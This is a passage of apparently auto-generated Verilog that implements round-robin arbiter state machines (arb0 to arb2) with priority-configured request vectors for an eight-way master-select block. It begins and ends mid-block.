                        s1_msel_arb0_next_state = s1_msel_arb0_grant5;
                    end
                    else
                    begin 
                        if ( s1_msel_arb0_req[6] ) 
                        begin
                            s1_msel_arb0_next_state = s1_msel_arb0_grant6;
                        end
                        else
                        begin 
                            if ( s1_msel_arb0_req[7] ) 
                            begin
                                s1_msel_arb0_next_state = s1_msel_arb0_grant7;
                            end
                            else
                            begin 
                                if ( s1_msel_arb0_req[0] ) 
                                begin
                                    s1_msel_arb0_next_state = s1_msel_arb0_grant0;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb0_req[1] ) 
                                    begin
                                        s1_msel_arb0_next_state = s1_msel_arb0_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb0_req[2] ) 
                                        begin
                                            s1_msel_arb0_next_state = s1_msel_arb0_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb0_grant4:
        begin
            if (  !( s1_msel_arb0_req[4]) | 1'b0 ) 
            begin
                if ( s1_msel_arb0_req[5] ) 
                begin
                    s1_msel_arb0_next_state = s1_msel_arb0_grant5;
                end
                else
                begin 
                    if ( s1_msel_arb0_req[6] ) 
                    begin
                        s1_msel_arb0_next_state = s1_msel_arb0_grant6;
                    end
                    else
                    begin 
                        if ( s1_msel_arb0_req[7] ) 
                        begin
                            s1_msel_arb0_next_state = s1_msel_arb0_grant7;
                        end
                        else
                        begin 
                            if ( s1_msel_arb0_req[0] ) 
                            begin
                                s1_msel_arb0_next_state = s1_msel_arb0_grant0;
                            end
                            else
                            begin 
                                if ( s1_msel_arb0_req[1] ) 
                                begin
                                    s1_msel_arb0_next_state = s1_msel_arb0_grant1;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb0_req[2] ) 
                                    begin
                                        s1_msel_arb0_next_state = s1_msel_arb0_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb0_req[3] ) 
                                        begin
                                            s1_msel_arb0_next_state = s1_msel_arb0_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb0_grant5:
        begin
            if (  !( s1_msel_arb0_req[5]) | 1'b0 ) 
            begin
                if ( s1_msel_arb0_req[6] ) 
                begin
                    s1_msel_arb0_next_state = s1_msel_arb0_grant6;
                end
                else
                begin 
                    if ( s1_msel_arb0_req[7] ) 
                    begin
                        s1_msel_arb0_next_state = s1_msel_arb0_grant7;
                    end
                    else
                    begin 
                        if ( s1_msel_arb0_req[0] ) 
                        begin
                            s1_msel_arb0_next_state = s1_msel_arb0_grant0;
                        end
                        else
                        begin 
                            if ( s1_msel_arb0_req[1] ) 
                            begin
                                s1_msel_arb0_next_state = s1_msel_arb0_grant1;
                            end
                            else
                            begin 
                                if ( s1_msel_arb0_req[2] ) 
                                begin
                                    s1_msel_arb0_next_state = s1_msel_arb0_grant2;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb0_req[3] ) 
                                    begin
                                        s1_msel_arb0_next_state = s1_msel_arb0_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb0_req[4] ) 
                                        begin
                                            s1_msel_arb0_next_state = s1_msel_arb0_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb0_grant6:
        begin
            if (  !( s1_msel_arb0_req[6]) | 1'b0 ) 
            begin
                if ( s1_msel_arb0_req[7] ) 
                begin
                    s1_msel_arb0_next_state = s1_msel_arb0_grant7;
                end
                else
                begin 
                    if ( s1_msel_arb0_req[0] ) 
                    begin
                        s1_msel_arb0_next_state = s1_msel_arb0_grant0;
                    end
                    else
                    begin 
                        if ( s1_msel_arb0_req[1] ) 
                        begin
                            s1_msel_arb0_next_state = s1_msel_arb0_grant1;
                        end
                        else
                        begin 
                            if ( s1_msel_arb0_req[2] ) 
                            begin
                                s1_msel_arb0_next_state = s1_msel_arb0_grant2;
                            end
                            else
                            begin 
                                if ( s1_msel_arb0_req[3] ) 
                                begin
                                    s1_msel_arb0_next_state = s1_msel_arb0_grant3;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb0_req[4] ) 
                                    begin
                                        s1_msel_arb0_next_state = s1_msel_arb0_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb0_req[5] ) 
                                        begin
                                            s1_msel_arb0_next_state = s1_msel_arb0_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb0_grant7:
        begin
            if (  !( s1_msel_arb0_req[7]) | 1'b0 ) 
            begin
                if ( s1_msel_arb0_req[0] ) 
                begin
                    s1_msel_arb0_next_state = s1_msel_arb0_grant0;
                end
                else
                begin 
                    if ( s1_msel_arb0_req[1] ) 
                    begin
                        s1_msel_arb0_next_state = s1_msel_arb0_grant1;
                    end
                    else
                    begin 
                        if ( s1_msel_arb0_req[2] ) 
                        begin
                            s1_msel_arb0_next_state = s1_msel_arb0_grant2;
                        end
                        else
                        begin 
                            if ( s1_msel_arb0_req[3] ) 
                            begin
                                s1_msel_arb0_next_state = s1_msel_arb0_grant3;
                            end
                            else
                            begin 
                                if ( s1_msel_arb0_req[4] ) 
                                begin
                                    s1_msel_arb0_next_state = s1_msel_arb0_grant4;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb0_req[5] ) 
                                    begin
                                        s1_msel_arb0_next_state = s1_msel_arb0_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb0_req[6] ) 
                                        begin
                                            s1_msel_arb0_next_state = s1_msel_arb0_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s1_msel_arb1_req = { ( s1_msel_req[7] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[15] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[14] ) ) } == 2'd1 ) ), ( s1_msel_req[6] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[13] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[12] ) ) } == 2'd1 ) ), ( s1_msel_req[5] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[11] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[10] ) ) } == 2'd1 ) ), ( s1_msel_req[4] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[9] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[8] ) ) } == 2'd1 ) ), ( s1_msel_req[3] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[7] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[6] ) ) } == 2'd1 ) ), ( s1_msel_req[2] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[5] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[4] ) ) } == 2'd1 ) ), ( s1_msel_req[1] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[3] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[2] ) ) } == 2'd1 ) ), ( s1_msel_req[0] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[1] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[0] ) ) } == 2'd1 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s1_msel_arb1_state <= s1_msel_arb1_grant0;
        end
        else
        begin 
            s1_msel_arb1_state <= s1_msel_arb1_next_state;
        end
    end
    always @ (  s1_msel_arb1_state or  { ( s1_msel_req[7] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[15] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[14] ) ) } == 2'd1 ) ), ( s1_msel_req[6] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[13] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[12] ) ) } == 2'd1 ) ), ( s1_msel_req[5] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[11] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[10] ) ) } == 2'd1 ) ), ( s1_msel_req[4] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[9] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[8] ) ) } == 2'd1 ) ), ( s1_msel_req[3] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[7] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[6] ) ) } == 2'd1 ) ), ( s1_msel_req[2] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[5] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[4] ) ) } == 2'd1 ) ), ( s1_msel_req[1] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[3] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[2] ) ) } == 2'd1 ) ), ( s1_msel_req[0] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[1] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[0] ) ) } == 2'd1 ) ) } or  1'b0)
    begin
        s1_msel_arb1_next_state = s1_msel_arb1_state;
        case ( s1_msel_arb1_state ) 
        s1_msel_arb1_grant0:
        begin
            if (  !( s1_msel_arb1_req[0]) | 1'b0 ) 
            begin
                if ( s1_msel_arb1_req[1] ) 
                begin
                    s1_msel_arb1_next_state = s1_msel_arb1_grant1;
                end
                else
                begin 
                    if ( s1_msel_arb1_req[2] ) 
                    begin
                        s1_msel_arb1_next_state = s1_msel_arb1_grant2;
                    end
                    else
                    begin 
                        if ( s1_msel_arb1_req[3] ) 
                        begin
                            s1_msel_arb1_next_state = s1_msel_arb1_grant3;
                        end
                        else
                        begin 
                            if ( s1_msel_arb1_req[4] ) 
                            begin
                                s1_msel_arb1_next_state = s1_msel_arb1_grant4;
                            end
                            else
                            begin 
                                if ( s1_msel_arb1_req[5] ) 
                                begin
                                    s1_msel_arb1_next_state = s1_msel_arb1_grant5;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb1_req[6] ) 
                                    begin
                                        s1_msel_arb1_next_state = s1_msel_arb1_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb1_req[7] ) 
                                        begin
                                            s1_msel_arb1_next_state = s1_msel_arb1_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb1_grant1:
        begin
            if (  !( s1_msel_arb1_req[1]) | 1'b0 ) 
            begin
                if ( s1_msel_arb1_req[2] ) 
                begin
                    s1_msel_arb1_next_state = s1_msel_arb1_grant2;
                end
                else
                begin 
                    if ( s1_msel_arb1_req[3] ) 
                    begin
                        s1_msel_arb1_next_state = s1_msel_arb1_grant3;
                    end
                    else
                    begin 
                        if ( s1_msel_arb1_req[4] ) 
                        begin
                            s1_msel_arb1_next_state = s1_msel_arb1_grant4;
                        end
                        else
                        begin 
                            if ( s1_msel_arb1_req[5] ) 
                            begin
                                s1_msel_arb1_next_state = s1_msel_arb1_grant5;
                            end
                            else
                            begin 
                                if ( s1_msel_arb1_req[6] ) 
                                begin
                                    s1_msel_arb1_next_state = s1_msel_arb1_grant6;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb1_req[7] ) 
                                    begin
                                        s1_msel_arb1_next_state = s1_msel_arb1_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb1_req[0] ) 
                                        begin
                                            s1_msel_arb1_next_state = s1_msel_arb1_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb1_grant2:
        begin
            if (  !( s1_msel_arb1_req[2]) | 1'b0 ) 
            begin
                if ( s1_msel_arb1_req[3] ) 
                begin
                    s1_msel_arb1_next_state = s1_msel_arb1_grant3;
                end
                else
                begin 
                    if ( s1_msel_arb1_req[4] ) 
                    begin
                        s1_msel_arb1_next_state = s1_msel_arb1_grant4;
                    end
                    else
                    begin 
                        if ( s1_msel_arb1_req[5] ) 
                        begin
                            s1_msel_arb1_next_state = s1_msel_arb1_grant5;
                        end
                        else
                        begin 
                            if ( s1_msel_arb1_req[6] ) 
                            begin
                                s1_msel_arb1_next_state = s1_msel_arb1_grant6;
                            end
                            else
                            begin 
                                if ( s1_msel_arb1_req[7] ) 
                                begin
                                    s1_msel_arb1_next_state = s1_msel_arb1_grant7;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb1_req[0] ) 
                                    begin
                                        s1_msel_arb1_next_state = s1_msel_arb1_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb1_req[1] ) 
                                        begin
                                            s1_msel_arb1_next_state = s1_msel_arb1_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb1_grant3:
        begin
            if (  !( s1_msel_arb1_req[3]) | 1'b0 ) 
            begin
                if ( s1_msel_arb1_req[4] ) 
                begin
                    s1_msel_arb1_next_state = s1_msel_arb1_grant4;
                end
                else
                begin 
                    if ( s1_msel_arb1_req[5] ) 
                    begin
                        s1_msel_arb1_next_state = s1_msel_arb1_grant5;
                    end
                    else
                    begin 
                        if ( s1_msel_arb1_req[6] ) 
                        begin
                            s1_msel_arb1_next_state = s1_msel_arb1_grant6;
                        end
                        else
                        begin 
                            if ( s1_msel_arb1_req[7] ) 
                            begin
                                s1_msel_arb1_next_state = s1_msel_arb1_grant7;
                            end
                            else
                            begin 
                                if ( s1_msel_arb1_req[0] ) 
                                begin
                                    s1_msel_arb1_next_state = s1_msel_arb1_grant0;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb1_req[1] ) 
                                    begin
                                        s1_msel_arb1_next_state = s1_msel_arb1_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb1_req[2] ) 
                                        begin
                                            s1_msel_arb1_next_state = s1_msel_arb1_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb1_grant4:
        begin
            if (  !( s1_msel_arb1_req[4]) | 1'b0 ) 
            begin
                if ( s1_msel_arb1_req[5] ) 
                begin
                    s1_msel_arb1_next_state = s1_msel_arb1_grant5;
                end
                else
                begin 
                    if ( s1_msel_arb1_req[6] ) 
                    begin
                        s1_msel_arb1_next_state = s1_msel_arb1_grant6;
                    end
                    else
                    begin 
                        if ( s1_msel_arb1_req[7] ) 
                        begin
                            s1_msel_arb1_next_state = s1_msel_arb1_grant7;
                        end
                        else
                        begin 
                            if ( s1_msel_arb1_req[0] ) 
                            begin
                                s1_msel_arb1_next_state = s1_msel_arb1_grant0;
                            end
                            else
                            begin 
                                if ( s1_msel_arb1_req[1] ) 
                                begin
                                    s1_msel_arb1_next_state = s1_msel_arb1_grant1;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb1_req[2] ) 
                                    begin
                                        s1_msel_arb1_next_state = s1_msel_arb1_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb1_req[3] ) 
                                        begin
                                            s1_msel_arb1_next_state = s1_msel_arb1_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb1_grant5:
        begin
            if (  !( s1_msel_arb1_req[5]) | 1'b0 ) 
            begin
                if ( s1_msel_arb1_req[6] ) 
                begin
                    s1_msel_arb1_next_state = s1_msel_arb1_grant6;
                end
                else
                begin 
                    if ( s1_msel_arb1_req[7] ) 
                    begin
                        s1_msel_arb1_next_state = s1_msel_arb1_grant7;
                    end
                    else
                    begin 
                        if ( s1_msel_arb1_req[0] ) 
                        begin
                            s1_msel_arb1_next_state = s1_msel_arb1_grant0;
                        end
                        else
                        begin 
                            if ( s1_msel_arb1_req[1] ) 
                            begin
                                s1_msel_arb1_next_state = s1_msel_arb1_grant1;
                            end
                            else
                            begin 
                                if ( s1_msel_arb1_req[2] ) 
                                begin
                                    s1_msel_arb1_next_state = s1_msel_arb1_grant2;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb1_req[3] ) 
                                    begin
                                        s1_msel_arb1_next_state = s1_msel_arb1_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb1_req[4] ) 
                                        begin
                                            s1_msel_arb1_next_state = s1_msel_arb1_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb1_grant6:
        begin
            if (  !( s1_msel_arb1_req[6]) | 1'b0 ) 
            begin
                if ( s1_msel_arb1_req[7] ) 
                begin
                    s1_msel_arb1_next_state = s1_msel_arb1_grant7;
                end
                else
                begin 
                    if ( s1_msel_arb1_req[0] ) 
                    begin
                        s1_msel_arb1_next_state = s1_msel_arb1_grant0;
                    end
                    else
                    begin 
                        if ( s1_msel_arb1_req[1] ) 
                        begin
                            s1_msel_arb1_next_state = s1_msel_arb1_grant1;
                        end
                        else
                        begin 
                            if ( s1_msel_arb1_req[2] ) 
                            begin
                                s1_msel_arb1_next_state = s1_msel_arb1_grant2;
                            end
                            else
                            begin 
                                if ( s1_msel_arb1_req[3] ) 
                                begin
                                    s1_msel_arb1_next_state = s1_msel_arb1_grant3;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb1_req[4] ) 
                                    begin
                                        s1_msel_arb1_next_state = s1_msel_arb1_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb1_req[5] ) 
                                        begin
                                            s1_msel_arb1_next_state = s1_msel_arb1_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb1_grant7:
        begin
            if (  !( s1_msel_arb1_req[7]) | 1'b0 ) 
            begin
                if ( s1_msel_arb1_req[0] ) 
                begin
                    s1_msel_arb1_next_state = s1_msel_arb1_grant0;
                end
                else
                begin 
                    if ( s1_msel_arb1_req[1] ) 
                    begin
                        s1_msel_arb1_next_state = s1_msel_arb1_grant1;
                    end
                    else
                    begin 
                        if ( s1_msel_arb1_req[2] ) 
                        begin
                            s1_msel_arb1_next_state = s1_msel_arb1_grant2;
                        end
                        else
                        begin 
                            if ( s1_msel_arb1_req[3] ) 
                            begin
                                s1_msel_arb1_next_state = s1_msel_arb1_grant3;
                            end
                            else
                            begin 
                                if ( s1_msel_arb1_req[4] ) 
                                begin
                                    s1_msel_arb1_next_state = s1_msel_arb1_grant4;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb1_req[5] ) 
                                    begin
                                        s1_msel_arb1_next_state = s1_msel_arb1_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb1_req[6] ) 
                                        begin
                                            s1_msel_arb1_next_state = s1_msel_arb1_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s1_msel_arb2_req = { ( s1_msel_req[7] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[15] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[14] ) ) } == 2'd2 ) ), ( s1_msel_req[6] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[13] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[12] ) ) } == 2'd2 ) ), ( s1_msel_req[5] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[11] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[10] ) ) } == 2'd2 ) ), ( s1_msel_req[4] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[9] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[8] ) ) } == 2'd2 ) ), ( s1_msel_req[3] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[7] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[6] ) ) } == 2'd2 ) ), ( s1_msel_req[2] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[5] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[4] ) ) } == 2'd2 ) ), ( s1_msel_req[1] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[3] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[2] ) ) } == 2'd2 ) ), ( s1_msel_req[0] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[1] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[0] ) ) } == 2'd2 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s1_msel_arb2_state <= s1_msel_arb2_grant0;
        end
        else
        begin 
            s1_msel_arb2_state <= s1_msel_arb2_next_state;
        end
    end
    always @ (  s1_msel_arb2_state or  { ( s1_msel_req[7] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[15] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[14] ) ) } == 2'd2 ) ), ( s1_msel_req[6] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[13] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[12] ) ) } == 2'd2 ) ), ( s1_msel_req[5] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[11] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[10] ) ) } == 2'd2 ) ), ( s1_msel_req[4] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[9] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[8] ) ) } == 2'd2 ) ), ( s1_msel_req[3] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[7] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[6] ) ) } == 2'd2 ) ), ( s1_msel_req[2] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[5] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[4] ) ) } == 2'd2 ) ), ( s1_msel_req[1] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[3] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[2] ) ) } == 2'd2 ) ), ( s1_msel_req[0] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[1] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[0] ) ) } == 2'd2 ) ) } or  1'b0)
    begin
        s1_msel_arb2_next_state = s1_msel_arb2_state;
        case ( s1_msel_arb2_state ) 
        s1_msel_arb2_grant0:
        begin
            if (  !( s1_msel_arb2_req[0]) | 1'b0 ) 
            begin
                if ( s1_msel_arb2_req[1] ) 
                begin
                    s1_msel_arb2_next_state = s1_msel_arb2_grant1;
                end
                else
                begin 
                    if ( s1_msel_arb2_req[2] ) 
                    begin
                        s1_msel_arb2_next_state = s1_msel_arb2_grant2;
                    end
                    else
                    begin 
                        if ( s1_msel_arb2_req[3] ) 
                        begin
                            s1_msel_arb2_next_state = s1_msel_arb2_grant3;
                        end
                        else
                        begin 
                            if ( s1_msel_arb2_req[4] ) 
                            begin
                                s1_msel_arb2_next_state = s1_msel_arb2_grant4;
                            end
                            else
                            begin 
                                if ( s1_msel_arb2_req[5] ) 
                                begin
                                    s1_msel_arb2_next_state = s1_msel_arb2_grant5;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb2_req[6] ) 
                                    begin
                                        s1_msel_arb2_next_state = s1_msel_arb2_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb2_req[7] ) 
                                        begin
                                            s1_msel_arb2_next_state = s1_msel_arb2_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb2_grant1:
        begin
            if (  !( s1_msel_arb2_req[1]) | 1'b0 ) 
            begin
                if ( s1_msel_arb2_req[2] ) 
                begin
                    s1_msel_arb2_next_state = s1_msel_arb2_grant2;
                end
                else
                begin 
                    if ( s1_msel_arb2_req[3] ) 
                    begin
                        s1_msel_arb2_next_state = s1_msel_arb2_grant3;
                    end
                    else
                    begin 
                        if ( s1_msel_arb2_req[4] ) 
                        begin
                            s1_msel_arb2_next_state = s1_msel_arb2_grant4;
                        end
                        else
                        begin 
                            if ( s1_msel_arb2_req[5] ) 
                            begin
                                s1_msel_arb2_next_state = s1_msel_arb2_grant5;
                            end
                            else
                            begin 
                                if ( s1_msel_arb2_req[6] ) 
                                begin
                                    s1_msel_arb2_next_state = s1_msel_arb2_grant6;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb2_req[7] ) 
                                    begin
                                        s1_msel_arb2_next_state = s1_msel_arb2_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb2_req[0] ) 
                                        begin
                                            s1_msel_arb2_next_state = s1_msel_arb2_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb2_grant2:
        begin
            if (  !( s1_msel_arb2_req[2]) | 1'b0 ) 
            begin
                if ( s1_msel_arb2_req[3] ) 
                begin
                    s1_msel_arb2_next_state = s1_msel_arb2_grant3;
                end
                else
                begin 
                    if ( s1_msel_arb2_req[4] ) 
                    begin
                        s1_msel_arb2_next_state = s1_msel_arb2_grant4;
                    end
                    else
                    begin 
                        if ( s1_msel_arb2_req[5] ) 
                        begin
                            s1_msel_arb2_next_state = s1_msel_arb2_grant5;
                        end
                        else
                        begin 
                            if ( s1_msel_arb2_req[6] ) 
                            begin
                                s1_msel_arb2_next_state = s1_msel_arb2_grant6;
                            end
                            else
                            begin 
                                if ( s1_msel_arb2_req[7] ) 
                                begin
                                    s1_msel_arb2_next_state = s1_msel_arb2_grant7;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb2_req[0] ) 
                                    begin
                                        s1_msel_arb2_next_state = s1_msel_arb2_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb2_req[1] ) 
                                        begin
                                            s1_msel_arb2_next_state = s1_msel_arb2_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb2_grant3:
        begin
            if (  !( s1_msel_arb2_req[3]) | 1'b0 ) 
            begin
                if ( s1_msel_arb2_req[4] ) 
                begin
                    s1_msel_arb2_next_state = s1_msel_arb2_grant4;
                end
                else
                begin 
                    if ( s1_msel_arb2_req[5] ) 
                    begin
                        s1_msel_arb2_next_state = s1_msel_arb2_grant5;
                    end
                    else
                    begin 
                        if ( s1_msel_arb2_req[6] ) 
                        begin
                            s1_msel_arb2_next_state = s1_msel_arb2_grant6;
                        end
                        else
                        begin 
                            if ( s1_msel_arb2_req[7] ) 
                            begin
                                s1_msel_arb2_next_state = s1_msel_arb2_grant7;
                            end
                            else
                            begin 
                                if ( s1_msel_arb2_req[0] ) 
                                begin
                                    s1_msel_arb2_next_state = s1_msel_arb2_grant0;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb2_req[1] ) 
                                    begin
                                        s1_msel_arb2_next_state = s1_msel_arb2_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb2_req[2] ) 
                                        begin
                                            s1_msel_arb2_next_state = s1_msel_arb2_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb2_grant4:
        begin
            if (  !( s1_msel_arb2_req[4]) | 1'b0 ) 
            begin
                if ( s1_msel_arb2_req[5] ) 
                begin
                    s1_msel_arb2_next_state = s1_msel_arb2_grant5;
                end
                else
                begin 
